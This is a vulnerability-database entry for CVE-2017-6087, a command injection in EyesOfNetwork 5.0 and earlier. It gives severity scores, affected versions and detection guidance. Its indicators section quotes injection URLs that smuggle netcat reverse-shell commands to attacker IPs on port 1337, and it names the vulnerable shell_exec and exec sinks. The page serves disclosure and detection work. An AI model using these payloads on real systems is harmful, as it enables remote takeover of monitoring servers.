cbcvebase.
CVE-2017-6087
published 2017-03-24

CVE-2017-6087: EyesOfNetwork ("EON") 5.0 and earlier allows remote authenticated users to execute arbitrary code via shell metacharacters in the selected_events[] parameter…

PriorityP262high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
7.18%
93.5th percentile
EyesOfNetwork ("EON") 5.0 and earlier allows remote authenticated users to execute arbitrary code via shell metacharacters in the selected_events[] parameter in the (1) acknowledge, (2) delete, or (3) ownDisown function in module/monitoring_ged/ged_functions.php or the (4) module parameter to module/index.php.

Affected

1 ranges
VendorProductVersion rangeFixed in
eonweb_projecteonweb<= 5.0-0

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
urlhttps://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
path/module/monitoring_ged/ged_actions.php
path/module/index.php
port1337
commandnc 10.0.5.124 1337 -e /bin/bash
commandnc 192.168.1.14 1337 -e /bin/bash
commandrpm -q <module> |grep '.eon' |wc -l
  • Detect shell metacharacter injection in the selected_events[] parameter on ged_actions.php — look for semicolons, pipes, or backticks in the selected_events[] query/POST parameter.
  • Detect shell metacharacter injection in the module parameter to module/index.php — look for pipe (|), semicolon (;), or backtick characters in the module GET parameter.
  • Alert on HTTP requests to /module/monitoring_ged/ged_actions.php containing URL-encoded shell metacharacters (%3B, %7C, %60) within the selected_events[] parameter.
  • Alert on HTTP requests to /module/index.php where the module parameter contains a pipe character (| or %7C) followed by a command string, indicating OS command injection.
  • Monitor for outbound netcat (nc) connections with the -e /bin/bash flag originating from the EON web server process, indicating successful reverse shell execution.
  • The vulnerable sink is shell_exec() in module/monitoring_ged/ged_functions.php (line 373) and exec() in module/index.php (line 24); monitor process spawning from the web server (e.g., apache/httpd spawning nc, bash, or sh).
  • ·The exploit requires prior authentication; unauthenticated access alone is insufficient to trigger RCE. Detection rules should account for authenticated sessions preceding the malicious request.
  • ·The PoC IPs (10.0.5.124, 192.168.1.14) and port (1337) are attacker-controlled and will vary in real attacks; do not rely solely on these specific values for detection.
  • ·The vulnerability is fixed in EON version 5.1; systems running 5.0 or earlier are affected. Verify the installed version before applying detection resources.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.